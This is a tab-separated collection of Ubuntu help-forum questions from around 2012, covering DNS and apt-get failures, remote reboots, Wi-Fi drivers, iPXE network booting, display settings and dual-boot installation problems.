205672	how to fix this where it can not ping any dns names but only ip , as a result apt-get update is failing	i am trying to install packages but it can not reach any dns but manually when i add dns to ip it works but still the last dns record is failing . # cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 sun-alienware-x51 91.189.91.15 us.archive.ubuntu.com 91.189.92.152 extras.ubuntu.com 91.189.92.184 security.ubuntu.com 91.189.94.156 ubuntu.com # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters # dig ubuntu.com ; < < > > dig 9.8.1-p1 < < > > ubuntu.com ; ; global options : +cmd ; ; connection timed out ; no servers could be reached # /var/tmp/dist # apt-get update ign http : //us.archive.ubuntu.com precise inrelease ign http : //us.archive.ubuntu.com precise-updates inrelease ign http : //us.archive.ubuntu.com precise-backports inrelease err http : //extras.ubuntu.com precise inrelease err http : //extras.ubuntu.com precise release.gpg unable to connect to extras.ubuntu.com : http : hit http : //us.archive.ubuntu.com precise release.gpg hit http : //us.archive.ubuntu.com precise-updates release.gpg ign http : //security.ubuntu.com precise-security inrelease hit http : //us.archive.ubuntu.com precise-backports release.gpg hit http : //us.archive.ubuntu.com precise release hit http : //security.ubuntu.com precise-security release.gpg hit http : //us.archive.ubuntu.com precise-updates release hit http : //us.archive.ubuntu.com precise-backports release hit http : //us.archive.ubuntu.com precise/main sources hit http : //us.archive.ubuntu.com precise/restricted sources hit http : //us.archive.ubuntu.com precise/universe sources hit http : //us.archive.ubuntu.com precise/multiverse sources hit http : //us.archive.ubuntu.com precise/main amd64 packages hit http : //security.ubuntu.com precise-security release hit http : //us.archive.ubuntu.com precise/restricted amd64 packages hit http : //us.archive.ubuntu.com precise/universe amd64 packages hit http : //us.archive.ubuntu.com precise/multiverse amd64 packages hit http : //us.archive.ubuntu.com precise/main i386 packages hit http : //us.archive.ubuntu.com precise/restricted i386 packages hit http : //us.archive.ubuntu.com precise/universe i386 packages hit http : //us.archive.ubuntu.com precise/multiverse i386 packages hit http : //us.archive.ubuntu.com precise/main translationindex hit http : //us.archive.ubuntu.com precise/multiverse translationindex hit http : //us.archive.ubuntu.com precise/restricted translationindex hit http : //us.archive.ubuntu.com precise/universe translationindex hit http : //us.archive.ubuntu.com precise-updates/main sources hit http : //us.archive.ubuntu.com precise-updates/restricted sources hit http : //us.archive.ubuntu.com precise-updates/universe sources hit http : //us.archive.ubuntu.com precise-updates/multiverse sources hit http : //us.archive.ubuntu.com precise-updates/main amd64 packages hit http : //us.archive.ubuntu.com precise-updates/restricted amd64 packages hit http : //us.archive.ubuntu.com precise-updates/universe amd64 packages hit http : //us.archive.ubuntu.com precise-updates/multiverse amd64 packages hit http : //us.archive.ubuntu.com precise-updates/main i386 packages hit http : //us.archive.ubuntu.com precise-updates/restricted i386 packages hit http : //us.archive.ubuntu.com precise-updates/universe i386 packages hit http : //us.archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //us.archive.ubuntu.com precise-updates/main translationindex hit http : //security.ubuntu.com precise-security/main sources hit http : //us.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //us.archive.ubuntu.com precise-updates/restricted translationindex hit http : //us.archive.ubuntu.com precise-updates/universe translationindex hit http : //us.archive.ubuntu.com precise-backports/main sources hit http : //us.archive.ubuntu.com precise-backports/restricted sources hit http : //us.archive.ubuntu.com precise-backports/universe sources hit http : //us.archive.ubuntu.com precise-backports/multiverse sources hit http : //us.archive.ubuntu.com precise-backports/main amd64 packages hit http : //us.archive.ubuntu.com precise-backports/restricted amd64 packages hit http : //us.archive.ubuntu.com precise-backports/universe amd64 packages hit http : //us.archive.ubuntu.com precise-backports/multiverse amd64 packages hit http : //us.archive.ubuntu.com precise-backports/main i386 packages hit http : //us.archive.ubuntu.com precise-backports/restricted i386 packages hit http : //us.archive.ubuntu.com precise-backports/universe i386 packages hit http : //us.archive.ubuntu.com precise-backports/multiverse i386 packages hit http : //security.ubuntu.com precise-security/restricted sources hit http : //security.ubuntu.com precise-security/universe sources hit http : //security.ubuntu.com precise-security/multiverse sources hit http : //security.ubuntu.com precise-security/main amd64 packages hit http : //security.ubuntu.com precise-security/restricted amd64 packages hit http : //us.archive.ubuntu.com precise-backports/main translationindex hit http : //us.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //us.archive.ubuntu.com precise-backports/restricted translationindex hit http : //us.archive.ubuntu.com precise-backports/universe translationindex hit http : //us.archive.ubuntu.com precise/main translation-en hit http : //us.archive.ubuntu.com precise/multiverse translation-en hit http : //us.archive.ubuntu.com precise/restricted translation-en hit http : //us.archive.ubuntu.com precise/universe translation-en hit http : //us.archive.ubuntu.com precise-updates/main translation-en hit http : //us.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //us.archive.ubuntu.com precise-updates/restricted translation-en hit http : //us.archive.ubuntu.com precise-updates/universe translation-en hit http : //us.archive.ubuntu.com precise-backports/main translation-en hit http : //us.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //us.archive.ubuntu.com precise-backports/restricted translation-en hit http : //us.archive.ubuntu.com precise-backports/universe translation-en hit http : //security.ubuntu.com precise-security/universe amd64 packages hit http : //security.ubuntu.com precise-security/multiverse amd64 packages hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //security.ubuntu.com precise-security/restricted i386 packages hit http : //security.ubuntu.com precise-security/universe i386 packages hit http : //security.ubuntu.com precise-security/multiverse i386 packages hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //security.ubuntu.com precise-security/universe translation-en reading package lists ... done w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/inrelease w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/release.gpg unable to connect to extras.ubuntu.com : http : w : some index files failed to download . they have been ignored , or old ones used instead . # /var/tmp/dist # ping extras.ubuntu.com ping extras.ubuntu.com ( 91.189.92.152 ) 56 ( 84 ) bytes of data . 64 bytes from extras.ubuntu.com ( 91.189.92.152 ) : icmp_req=1 ttl=50 time=111 ms 64 bytes from extras.ubuntu.com ( 91.189.92.152 ) : icmp_req=2 ttl=50 time=111 ms ^c -- - extras.ubuntu.com ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 1001ms rtt min/avg/max/mdev = 111.371/111.614/111.858/0.413 ms
205673	no option to install italian language as default on kubuntu 12.10	i have just finished installing kubuntu 12.10 via wubi , i am customizing my system and , as you can see from the screenshot down below , there 's no option to switch from english to italian as default language system . how do i fix this ? no option available for switching system language
205674	remote reboot over ssh does not restart	i would like to remotely reboot my ubuntu 12.04 lts server via ssh . i do sudo reboot and i loose connection and the server connection does not reappear . it does not ping . when i go the the physical computer with a screen attached i see a black screen and hear that the server is still on . i do a hard power off ( press power on button for a few seconds ) and the server halts . after i press power on the server boots with no problem . as far as i remember the remote reboot has previously worked on that server . i wonder if sudo reboot & will help ? i suppose i could also try sudo shutdown -r and see if that does any difference . i have listed an excerpt of /etc/log/syslog below . the last thing it records is the stopping of the logging . oct 24 10:14:49 servername kernel : [ 1354427.594709 ] init : cron main process ( 1060 ) killed by term signal oct 24 10:14:49 servername kernel : [ 1354427.594908 ] init : irqbalance main process ( 1080 ) killed by term signal oct 24 10:14:49 servername kernel : [ 1354427.595299 ] init : tty1 main process ( 1424 ) killed by term signal oct 24 10:14:49 servername kernel : [ 1354427.637747 ] init : plymouth-upstart-bridge main process ( 20873 ) terminated with status 1 oct 24 10:14:49 servername kernel : kernel logging ( proc ) stopped . oct 24 10:14:49 servername rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 876 '' x-info= '' http : //www.rsyslog.com '' ] exiting on signal 15 . oct 24 10:25:34 servername kernel : imklog 5.8.6 , log source = /proc/kmsg started . oct 24 10:25:34 servername rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 862 '' x-info= '' http : //www.rsyslog.com '' ] start
205676	how to change mouse speed/sensitivity ?	i am on an asus zenbook ux32vd in ubuntu 12.10 . both in 12.04 and 12.10 i have n't been able to change the mouse speed ( i.e . the `` sensitivity '' in the mouse/touchpad dialog ) . i can change the slider , but nothing changes . this is a big problem for me , since the mouse speed is somewhat slow . any suggestions ? the problem is both for the touchpad and mouse .
205677	ca n't access my old email in thunderbird after upgrading to 12.10	i was using thunderbird on 12.04 and upgraded to 12.10 with the option that keeps my current data 3 days ago . when i entered thunderbird , it asked for account data , but all of the email from the previous version and all the rules i had defined are gone . but my other files like documents and photos are there . is there a way i can recover my old email ?
205678	typing persian ( farsi ) replaces some characters with dashes	i have already installed all of things that are suggested to type persian better but still it does n't work as expected . libreoffice replaces some letters with a dash - or an underscore _ . for example , this is what i typed : الان and this is what i saw on the screen : الا_ن
205685	install ubuntu-desktop on ubuntu server 12.10	just installed the new ubuntu server 12.10 x64 and wanted to install the unity gui ... when i try any of these commands : sudo apt-get install ubuntu-desktop sudo apt-get install xubuntu-desktop sudo apt-get install kubuntu-desktop it always says : e : unable to locate package ubuntu-dekstop even replaced the sources.list file with a new quantal sources.list file , but i get the same error ... i tried the update command but got this error : anyone have any idea ? !
205688	what 's the difference between set , export and env and when should i use each ?	every so often i 'll bash out a bash script and it strikes me there are a few ways of setting a variable : key=value env key=value export key=value when you 're inside a script or a single command ( for instance , i 'll often chain a variable with a wine launcher to set the right wine prefix ) these seem to be completely interchangeable but surely that ca n't be the case . what 's the difference between these three methods and can you give me an example of when i would specifically want to use each one ? definitely related to what is the difference between `var= ... ` and `export var= ... ` ? but i want to know how env fits into this too , and some examples showing the benefits of each would be nice too : )
205691	missing resolution in ubuntu 12.04 lts	i have a nvida gt 630m in my laptop . i tried to install the graphics driver by using the following command : sudo nvidia after installing i face a serious problem with the resolution : the only one available is 640*480 . what should i do , to have my graphical device correctly installed .
205695	12.04 hangs at `` checking battery state ''	my 12.04 system hangs at `` checking battery state '' . at this stage , no commands work eg : ctrl+alt+f1 , or alt+f5 . i ran recovery mode , and ran the following commands : sudo mount -o remount , rw / sudo dpkg-reconfigure gdm gdm was the only display manager installed , so i did n't get a gui screen . i have an integrated graphics card `` intel corporation mobile 4 chipset integrated graphics controller ( rev 07 ) '' . so i can not install nvidia drivers as everyone else suggests . i have gone through several similar questions but everyone suggests reconfiguring gdm or reinstalling graphic drivers . i ran the following commands to get the latest x-swat drivers : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get upgrade the system still hung at the same line . the other option is to re-install ubuntu , which is out of the question , since we have a very specific install for our project where the settings are very hard to duplicate . suggestions/comments welcome .
205696	boot custom precise live cd via ipxe	i configured isc-dhcp , ipxe and tftpboot so i can boot over network via pxe . it works the ubuntu netinstall image is booting nice with pxelinux.0 . i created a custom live cd with this tutorial https : //help.ubuntu.com/community/livecdcustomizationfromscratch . it boots nicely in an vm . now i wa n't to connect this image to my pxe environment . the best would be to boot and append the disk via http . there are plenty of tutorials . but i ca n't get the squashfs mounted . what is the best way to do this . do i need pxelinux , do i need nfs ? i 'm confused about all the different bootloaders . help is highly appreciated . thank you . part of dhcpd.conf next-server 10.1.1.1 ; if exists user-class and option user-class = `` ipxe '' { filename `` menu.ipxe '' ; } else { filename `` undionly.kpxe '' ; } and menu.ipxe # ! ipxe set smartos-build 20121004t212912z # # # # # # # # main menu # # # # # # # # # # # # # # # # # # # : start menu welcome item item -- gap -- -- -- -- -- -- -- -- -- -- -- -- -- - operating systems -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- item cellos-storage boot cellos item smartos boot smartos ( $ { smartos-build } ) item ubuntu boot ubuntu precise 12.04 netinstall item -- gap -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- utilities -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - item shell enter ipxe shell item reboot reboot item item exit exit ( boot local disk ) choose -- default cellos-storage -- timeout 5000 target & & goto $ { target } # # # # # # # # # # utility items # # # # # # # # # # # # # # # # # # # # : shell echo type exit to get the back to the menu shell set menu-timeout 0 goto start : reboot reboot : exit exit # # # # # # # # # # menu items # # # # # # # # # # # # # # # # # # # # # # # : cellos-storage kernel /cellos/storage/cellos-latest/casper/vmlinuz initrd /cellos/storage/cellos-latest/casper/initrd.lz # chain http : //10.1.1.1/boot/cellos/storage/cellos-latest.iso boot # smartos root shadow is `` root '' : smartos kernel /smartos/ $ { smartos-build } /platform/i86pc/kernel/amd64/unix -b root_shadow= ' $ 5 $ 2hohrnk3 $ nvllm.1kqbbb0wjop7xciwgnllhzp2hnt.mdo7dpxya' initrd /smartos/ $ { smartos-build } /platform/i86pc/amd64/boot_archive boot : ubuntu kernel /ubuntu/precise/netinstall/ubuntu-installer/amd64/linux initrd /ubuntu/precise/netinstall/ubuntu-installer/amd64/initrd.gz boot goto start
205697	what is the best way to migrate a mail server ?	i have a plesk panel mail server with used hard disk space of 480gb out of a total of 900gb . i would like to migrate the plesk panel and data to a new server on raid 1 hard drives ( 600gb ) . the mail server has os ubuntu 10.04 lts and the new server that i set up is also on ubuntu 10.04 lts . are there any commands that can help me achieve this ? the server runs postfix mta
205701	power failure during upgrade from 12.04 to 12.10 resulting to desktop not working	while upgrading ubuntu 12.04 to 12.10 due to power failure , the desktop environment is not working . it shows 12.04 but no icons are there . if i went through ctrl+alt+f1 it went into terminal in which my login id and password is not working . how one can solve this problem ?
205704	can not get atheros ar9285 to work on 12.10	i 've already went through all possible advices and still can not start my atheros ar9285 wireless card . i have a laptop toshiba portege z830 where the wifi already worked under windows 7 . but after migration on ubuntu 12.10 . i 'm not able get it work . this is what i see on command lshw *-network unclaimed description : network controller product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c0500000-c050ffff this is what i see on command rfkill list 0 : toshiba bluetooth : bluetooth soft blocked : yes hard blocked : no 1 : hci0 : bluetooth soft blocked : yes hard blocked : no any idea ?
205705	facebook integration in empathy does n't work in 12.10	the new web apps feature is fun , i 've set up everything as it should be , but empathy still does n't connect to facebook . when i go to the `` online-accounts '' dialog and open the empathy options dialog in the facebook tab this shows up : identification is blank and ca n't be edited alias is blank , but can be edited a notification saying `` go online to edit your personal data '' is visible i 've tried logging into facebook using my email address and my username , both with the same results .
205706	machine check error on asus while booting from usb	i put the last ubuntu iso on my usb stick using unetbootin , after formatting it to fat32 . i 've already done that before with other operating systems and it worked . i ca n't actually boot ubuntu from usb since i get a black screen with the error `` machine check error '' on top the an automatic reboot happens . the error appears right after the boot , i ca n't see anything else before . i 'm using my asus x54l latop . does anybody know how to solve this ? installation from cd/dvd works .
205708	can connect to wifi router but not the internet 12.10	i believe i have tried every trick in the book ! i am able to access my router from my ubuntu desktop but not even a single site on the internet . i have installed the drivers for my pci wifi card following this procedure : http : //steveswinsburg.wordpress.com/2011/03/12/how-to-install-a-d-link-dwa-525-wireless-network-card-in-ubuntu-10-04/ earlier it did n't connect to the internet and kept prompting me for the password . after i installed the driver it got connected ! but now i cant access the internet and can only access my router . i deleted the resolv.conf file . i have also tried the `` rkill '' command and it shows it is unlocked . i have even tried pinging the ip 's 8.8.8.8 & 8.8.4.4 and i get replies from both . i have also added them on my wifi configuration setup on ubuntu desktop . i am new to ubuntu but learning fast : - ) these are the things i do n't like about ubuntu , the simple tasks are difficult for a person coming from windows . i am using ubuntu 12.10. please reply at the earliest i would be very thankful .
205714	how to share wired internet connection to wifi ( non adhoc ) ?	i have a wired interconnection in my ubuntu laptop . i want to share this connection to my nexus 7 . i tried creating a ad-hoc connection but n7 does n't recognise ad-hoc wifi . so i found my old wireless router ( beetel 450tc1 ) and connected both my laptop and n7 . i ran a web server in my laptop and i am able to see it in n7 . now , how do i forward my wired internet connection to n7 ? i think i must run some proxy server to forward all requests to eth0 interface . any ideas , how to set this up ?
205718	how can i ( install and ) use the cloop device in ubuntu ?	i need to be able to mount and read on the fly a compressed dd image . i think that cloop is what i need . but i do n't see it in /lib/modules and , anyway , i 'd like to know how it works first . anybody has already managed to mount a compressed image and read it on the fly via cloop ?
205719	how to do a near-full desktop experience sync ?	i have two machines in two fairly distant locations that i do development on , depending on where i am . i currently use a git sync to keep the following dotfiles manually synced .irssi .ssh/config .vim .bashrc .profile .vmirc .hgrc .bash_aliases .config/ipython and a few accessory scripts that sort out ssh key generation and distribution to a few servers that i regularly interact with . these are great for syncing console-style applications , but for syncing things like web browsing etc , i just lastpass . my question is , how can i go about syncing the general desktop experience ( i.e . gconf , dconf , backgrounds , compiz settings , etc ) without having massive conflicts from run-time modified files ? in terms of hardware , the machines are fairly similar ( dual screens , nvidia displays , 12.04.1 , etc ) and it 's easy enough to do package syncing between the machines . basically wondering if anyone has any 'best practices ' ?
205723	how to clone displays with my laptop and an external hd monitor	i have been trying to connect my laptop to an external monitor ( different resolutions ) . my idea was to setup the external monitor as a clone of the laptop screen . in ubuntu quantal 's display settings i can detect both displays but i can only setup as an expanded dual monitor . the mirror option is visible but disabled . is there a way to `` enable '' mirror mode ? edit : in answer to ubunchu i 'll try to be clearer . i merely want both displays to show the exact same image . i assume that the mirror option would do this but it is disabled .
205726	why is `` http : //my.archive.ubuntu.com '' very slow ?	i am currently updating my freshly installed ubuntu 12.10 and it 's taking a very long time . most of the time i get a download speed of 222b/s . the highest has been 1kb/s . can anyone fix this problem ? its really not worth waiting for more than an hour for a 5mb update . ( my internet download speed goes up to around 224kb/s ) . ( dated 24th october , 2012 )
205728	installation of unity-webapps-preview 12.04 not possible	i tried to install unity-webapps-preview on the long term support version of ubuntu 12.04 64bit . i used this howto but every time i try , this happens : tom @ tom-laptop : ~/downloads $ sudo apt-get install unity-webapps-preview paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut statusinformationen werden eingelesen ... fertig einige pakete konnten nicht installiert werden . das kann bedeuten , dass sie eine unmögliche situation angefordert haben oder , wenn sie die unstable-distribution verwenden , dass einige erforderliche pakete noch nicht erstellt wurden oder incoming noch nicht verlassen haben . die folgenden informationen helfen ihnen vielleicht , die situation zu lösen : die folgenden pakete haben unerfüllte abhängigkeiten : unity-webapps-preview : hängt ab von : xul-ext-unity soll aber nicht installiert werden hängt ab von : xul-ext-websites-integration soll aber nicht installiert werden hängt ab von : xul-ext-webaccounts soll aber nicht installiert werden e : probleme können nicht korrigiert werden , sie haben zurückgehaltene defekte pakete . translation : tom @ tom-laptop : ~ / downloads $ sudo apt-get install unity-webapps-preview reading package lists ... ready dependency tree status information is read ... ready some packages could not be installed . this may mean that you have requested an impossible situation or if you are unstable distribution use that some required packages have not have been created or have have not been moved from incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : unity-webapps-preview : depends : xul-ext-unity will not be installed depends on : xul-ext-websites-integration will not be installed depends on : xul-ext-web accounts will not be installed e : problems can not be corrected , you have held broken packages back . and when i try to install those needed packages ( xul-ext-unity , xul ext websites integration , xule xt webaccounts ) i get this : die folgenden pakete haben unerfüllte abhängigkeiten : xul-ext-unity : beschädigt : firefox ( > = 15.+ ) aber 17.0~b2+build1-0ubuntu0.12.04.1~mfn2 soll installiert werden xul-ext-webaccounts : beschädigt : firefox ( > = 14.+ ) aber 17.0~b2+build1-0ubuntu0.12.04.1~mfn2 soll installiert werden xul-ext-websites-integration : beschädigt : firefox ( > = 15.+ ) aber 17.0~b2+build1-0ubuntu0.12.04.1~mfn2 soll installiert werden e : probleme können nicht korrigiert werden , sie haben zurückgehaltene defekte pakete . translation : the following packages have unmet dependencies : xul-ext-unity : damaged : firefox ( > = 15 + ) but 17.0~b2+build1-0ubuntu0.12.04.1~mfn2 will be installed xul-ext-web accounts : damaged : firefox ( > = 14 + ) but 17.0 will 17.0~b2+build1-0ubuntu0.12.04.1~mfn2 be installed xul-ext-websites-integration : damaged : firefox ( > = 15 + ) but 17.0~b2+build1-0ubuntu0.12.04.1~mfn2 will be installed e : problems can not be corrected , you have held broken packages back . ( firefox 17 is installed , though ) edit : thanks for that extremely quick answer , but unfortunately it helped nothing . same error still . ps : i even tried sudo apt-get install -f -m unity-webapps-preview
205732	can not install netbeans after upgrade from 12.04 to 12.10	this is the message error from the terminal : coca @ bakorng : /var/www/shared $ sh netbeans-7.2-ml-php-linux.sh configuring the installer ... searching for jvm on the system ... extracting installation data ... running the installer wizard ... can`t initialize ui running in headless mode exception : java.awt.headlessexception thrown from the uncaughtexceptionhandler in thread `` main '' coca @ bakorng : /var/www/shared $ how do i fix this ?
205734	compiz burn effect gone in 12.10 ?	it 's a small thing , but i like it when windows burst into flames when i close them . i 've been using this effect in compiz for ages in gnome ultimate ( aka gnome classic ) . after installing 12.10 , not only has this effect seemingly been disabled , it seems that the extra animations and effects that support it are n't even available . in synaptic , there is a `` transitional dummy package '' for extra animations , but installing it does nothing . can i get back my beloved flame effect ?
205737	how to automount all external devices with read & write privileges ? ( can not edit tags of files from external drive )	i do not have enough understanding of this issue for the moment but please bear with me and i 'll edit/improve the question to make it of more general scope as soon as i get proper help and i better understand the matter . so , i keep my music files on an external ( samsung , fat32 ) drive and use foobar2000 with wine to edit their tags ( get tags from freedb , among other things ) now i can not do that anymore . the same files can be edited if copied on the desktop . i guess this is related to the fact that the external drive is auto-mounted with limited privileges : in thunar its files and folders have a lock/cross/etc ( depending on the icons i use ) how to remedy this ? ( i 'm in lubuntu 12.04 ) odd thing is that adding a second external drive does not involve the same issue . while their permissions look the same one difference between them is that the one with the problem is fat32 and the other is ntfs . they look like this in gparted bu this does n't seem to count : switching them between the two usb slots made them mount both ok , but putting them back in the initial order changed the issue : made samsung load ok while the other one showed the lock sign . maybe it 's related to the order in which they are plugged ... even more bizarre is that while the samsung with music was thus ok , i started to edit the tags of music files in foobar2000 , as intended . after succeeding in doing that for an album , the second would not be edited : the same issue re-emerged . restarting thunar i see now that the lock/cross sign went back from the second external drive to the samsung ! ! ! how to automount all external devices ( also : always and permanently ) with full privileges ?
205738	how can i change the software centre prices to gbp ?	the pricing in the software centre and in the dash is in usd . i do n't live in the usa so this is not relevent to me . is it possible to change to gbp or even eur ?
205739	how to install gyachi on ubuntu 12.10	ok ... there is no way to install it on ubuntu 12.10 i would like to use gyachi on ubuntu 12.10 . i tried these steps but it does n't work.. i wanted to compile it myself ... but it need some libs ... it made me confused ... so i gave up sudo add-apt-repository ppa : adilson/experimental sudo apt-get update sudo apt-get install gyachi thank you for your helps at first command the output : sudo add-apt-repository ppa : adilson/experimental you are about to add the following ppa to your system : contains packages that are not in the official debian/ubuntu repositories and newer versions and snapshots which are not available yet in the repositories . theses packages are experimental . use them at your own risk . more info : https : //launchpad.net/~adilson/+archive/experimental press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmp3y3i7p/secring.gpg ' created gpg : keyring `/tmp/tmp3y3i7p/pubring.gpg ' created gpg : requesting key 27b81625 from hkp server keyserver.ubuntu.com gpg : /tmp/tmp3y3i7p/trustdb.gpg : trustdb created gpg : key 27b81625 : public key `` launchpad experimental packages ppa '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok and after sudo apt-get update ; this is ( sudo apt-get install gyachi ) 's output here is the output : sudo apt-get install gyachi reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gyachi
205740	ubuntu one on samsung galaxi mini2 : i can see my folders but not the files inside !	i run ubuntu 12.04 on my laptop and i use ubuntu one for my back ups and as cloud ... i have my music there and my photos out of any back up folder . i just bought a smartphone samsung galaxy mini2 and i downloaded the ubuntu one app to be able to have my music on this device ... .the problem is that when i try to access my files , i can see all the folders and subfolders but when i open them it says that they are empty ! all of them ! i can see the folders , but not the files inside ! what 's up ? thank you , michela
205744	how to stop ubuntu from accessing internet via proxy ?	i used to access internet with my laptop in campus , which require proxy . my internet at home do not require proxy -or rather i do n't know any proxy setting since i always set browser setting to automatic . when i try to access internet at home with ubuntu it always try to access it with my campus proxy . i have no idea with to stop it . browsing is no problem . i can change the setting in firefox easily enough . the problem is with installing new software . help please ?
205747	problem with canonical partners repository ?	i enabled the canonical partners repository but i ca n't install acrobat reader ( acroread ) . i 've found only a few programs in ubuntu software center in the canonical partners section . is this bug due to something i did or something else ? i am using ubuntu 12.10 64bit .
205756	will installing cuda for my nvidia card make opencl available ?	i 'm trying to use a program called 'pyrit ' which can use opencl . when i run the program , i get this warning : failed to load pyrit 's opencl-core ( 'failed to enumerate opencl-platforms ( unknown clresult ) ' ) ( the code for pyrit to work with opencl has been successfully compiled and installed already ) i have an nvidia hybrid optimus graphics card ( geforce gt 630m ) , and i assume i need to enable opencl for it to work properly . i want to avoid cuda if i can , but i do n't know if that 's an option . i 'm not sure what i need to do to enable opencl . should i just follow the normal instructions for installing cuda as described here ? how can i get nvidia cuda or opencl working on a laptop with nvidia discrete card/intel integrated graphics ?
205758	ps : show thread and display as ascii `` forest ''	my favourite ps invocation is : ps -efww ef as i need to watch all processes ( -e ) , get extended information about them ( -f ) , see the environment ( e ) they operate within , wrapping lines ( -w -w ) so i do n't lose any part of that , and visually group ( f ) child processes under their parents , for an at-a-glance overview . i have `` wasted '' the whole morning trying to get any thread information to appear as well , following the same visualisation logic above . i must have tried 40 different combinations of options . ( actually , i just checked my .bash_history and i have tried more ! ) . combinations included swapping f and -h for forest display , for instance . sometimes i even tried permutations to check insidious `` orderings '' ... none of the threading options seem to be compatible with my `` monitoring screen '' setup . i am talking about h , -l , m , -m and -t. i am baffled . am i doing it wrong ? how are you guys doing it ? specifically : i need to watch for processes like download managers who go funky with 30 to 80 threads all of a sudden ...
205759	just upgraded to 12.10 , and can not enable virtualbox driver	after upgrading to 12.10 and installing virtualbox guest additions , they can not be enabled in the additional drivers pane . if i click the only available option , `` continue using a manually installed driver , the apply changes button will stay grayed out , and the current selection seems to be do not use the device ( though it 's grayed out . ) any idea about this ?
205760	how to install myunity in 12.10 ?	i have just upgraded from 12.04 to 12.10 , now the problem is that i have lost my my unity and all the drive is shown in the launcher . i tried this link but fail . i even tried to install myunity again from ubuntu software centre but can not find . so , i tried this link but it shows launch application instead of installing .
205764	can not mount usb 3 harddrive	i can not mount an usb 3 harddrive . when looking at dmesg i got the following error : [ 96.463269 ] usb 3-2.1 : > new low-speed usb device number 10 using xhci_hcd [ 96.485777 ] usb 3-2.1 : > new usb device found , idvendor=046d , idproduct=c025 [ 96.485787 ] usb 3-2.1 : > new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 96.485792 ] usb 3-2.1 : > product : usb-ps/2 optical mouse [ 96.485797 ] usb 3-2.1 : > manufacturer : b16_b_02 [ 96.486118 ] usb 3-2.1 : > ep 0x81 - rounding interval to 64 microframes , ep desc says 80 microframes [ 96.490149 ] input : b16_b_02 usb-ps/2 optical mouse as /devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2.1/3-2.1:1.0/input/input12 [ 96.490500 ] hid-generic 0003:046d : c025.0003 : > input , hidraw0 : usb hid v1.10 mouse [ b16_b_02 usb-ps/2 optical mouse ] on usb-0000:00:14.0-2.1/input0 [ 114.088984 ] usb 3-2.3 : > new high-speed usb device number 11 using xhci_hcd [ 114.105041 ] usb 3-2.3 : > new usb device found , idvendor=13fd , idproduct=1618 [ 114.105051 ] usb 3-2.3 : > new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 257.531777 ] usb 3-2.3 : > usb disconnect , device number 11 [ 258.513912 ] usb 3-2.4 : > new high-speed usb device number 12 using xhci_hcd [ 258.514046 ] usb 3-2.4 : > device not responding to set address . [ 258.717649 ] usb 3-2.4 : > device not responding to set address . [ 258.921203 ] usb 3-2.4 : > device not accepting address 12 , error -71 [ 258.937388 ] hub 3-2:1.0 : > unable to enumerate usb device on port 4 i have tried to mount the drive on ubuntu-12.04 and it mounts just fine .
205771	copy recovery partition using ubuntu	i have a dell computer and i will be dban ing the hdd because it has a bad sector on it that is slowing down the system . so i am wanting to copy the recovery partition to an image or another hdd . i am wanting a method that can apply to copying it both to an image or hdd so i can use this in the future . i also would like a method i can remmeber . i have stumbled across a few but most use dd if=/dev/sdax of=~/recovery_partition.img or some sort . i really would like something i can remember ( such as a gui program ) because i am new to ubuntu and still trying to learn . thanks for your help !
205772	ca n't install ubuntu with windows 7	in spanish : hola . estoy teniendo problemas para instalar ubuntu 10.04 de 32 bits en una pc que tiene windows 7 ultimate preinstalado de 64 bits . puntualmente el problema es que al insertar el cd de ubuntu y comenzar la instalacion , no reconoce que haya otro sistema operativo en el disco . la unica opcion que me da es la de instalar ubuntu en todo el disco . intente creando una nueva particion en el disco desde windows pero tampoco la reconoce : ve a todo el disco como vacio . desde windows veo que hay dos particiones , una la principal y otra la paricion del sistema que crea windows 7 de 100 mb . el disco es de 1 tb . wubi tampoco funciona . luego de instalar y bootear desde ubuntu , muestra un error diciendo que no encuentra el directorio raiz y que no puede continuar la instalacion , o algo asi . escucho sugerencias . muchas gracias . en ingles : hi . i 'm having trouble to install ubuntu 10.04 ( 32 bits ) on a computer with windows 7 ultimate ( 64 bits ) . the problem is that when i insert the ubuntu 's cd and begin the installation , it does n't recognize windows on the hard disk . it only allows me to install ubuntu over all the disk . i tried creating a new partition in the hard disk on windows but neither recognizes it : see all the disk as empty . on windows i see two partitions , the main one and a system 's partition of 100 mb , which windows creates on it installation . the hard disk has 1 tb . wubi does n't work either . after install and booting ubuntu , it shows an error saying that does n't find the root directory and the installation ca n't continue , or something like that . thank you .
